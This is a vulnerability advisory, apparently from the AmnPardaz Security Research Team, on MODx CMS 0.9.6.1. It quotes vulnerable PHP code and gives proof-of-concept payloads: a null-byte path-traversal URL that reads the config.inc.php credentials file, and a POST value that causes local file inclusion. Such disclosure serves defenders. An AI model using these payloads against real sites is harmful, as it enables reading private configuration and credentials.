MODx CMS Source code disclosure, local file inclusion
########################## WwW.BugReport.ir #########################
#
# AmnPardaz Security Research Team
#
# Title: MODx CMS Vulnerabilities
# Vendor: http://modxcms.com
# Bugs: Source code disclosure, local file inclusion
# Vulnerable Version: 0.9.6.1 (prior versions also may be affected)
# Exploitation: Remote with browser
# Fix Available: No!
################################################################
####################
- Description:
####################
quote from vendor: "MODx is an open source PHP Application Framework =20
that helps you take control of your online content.
It empowers developers and advanced users to give as much control as =20
desired to whomever they desire for day-to-day website content =20
maintenance chores."
####################
- Vulnerability:
####################
+--> source code disclosure
Code Snippet:
/assets/js/htcmime.php Line#18-36
$fname =3D (array_key_exists("file", $_GET)) ? $_GET["file"] : "";
// basename() also strips \x00, we don't need to worry about ? and # in path=
:
// Must be real files anyway, fopen() does not support wildcards
$ext =3D array_pop(explode('.', basename($fname)));
if (strcasecmp($ext, "htc") !=3D 0 || !file_exists($fname))
exit ("No file specified, file not found or illegal file.");
$flen =3D filesize($fname);
header("Content-type: text/x-component");
header("Content-Length: ".$flen);
header("Content-Disposition: inline; filename=3D$fname");
$fp =3D fopen($fname, "r");
echo fread($fp, $flen);
fclose($fp);
[as developer comments out] When magic_quotes_gpc is disabled, its =20
possible to bypass extension check via null character injection
( because of null terminating behavior in any function that uses =20
fopen_wrappers ) which could result in source code disclosure!
POC : =20
http://localhost/modx-0.9.6.1/assets/js/htcmime.php?file=3D../../manager/inc=
ludes/config.inc.php%00.htc
+-->Local file inclusion
Code Snippet:
/assets/snippets/AjaxSearch/AjaxSearch.php line#17-41
$stripHTML =3D $_POST['stripHTML'];
$stripSnip =3D $_POST['stripSnip'];
$stripSnippets =3D $_POST['stripSnippets'];
$useAllWords =3D $_POST['useAllWords'];
$searchStyle =3D $_POST['searchStyle'];
$minChars =3D $_POST['minChars'];
$maxResults =3D $_POST['maxResults'];
$showMoreResults =3D $_POST['showMoreResults'];
$moreResultsPage =3D $_POST['moreResultsPage'];
$as_language =3D $_POST['as_language'];
$extract =3D $_POST['extract'];
$docgrp =3D $_POST['docgrp'];
$highlightResult =3D $_POST['highlightResult'];
include_once MODX_BASE_PATH . =20
'assets/snippets/AjaxSearch/includes/AjaxSearch.inc.php';
include MODX_BASE_PATH . =20
'assets/snippets/AjaxSearch/includes/templates.inc.php';
#include default language file
include(MODX_BASE_PATH . "assets/snippets/AjaxSearch/lang/english.inc.php");
#include other language file if set.
if($as_language!=3D"english" && $as_language !=3D '') {
=09if(file_exists(MODX_BASE_PATH . =20
"assets/snippets/AjaxSearch/lang/".$as_language.".inc.php"))
=09=09include MODX_BASE_PATH . =20
"assets/snippets/AjaxSearch/lang/".$as_language.".inc.php";
}
There is no input validation here therefore its possible to set =20
$as_language which could result in local file inclusion!
POC:
Method=3DPOST
Action=3Dhttp://localhost/modx-0.9.6.1/index-ajax.php?
Name=3Das_language Value=3D../ajaxSearch_readme.txt%00
Name=3Dq Value=3Dassets/snippets/AjaxSearch/AjaxSearch.php
####################
- Credit :
####################
Original Advisory:
AmnPardaz Security Research Team
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com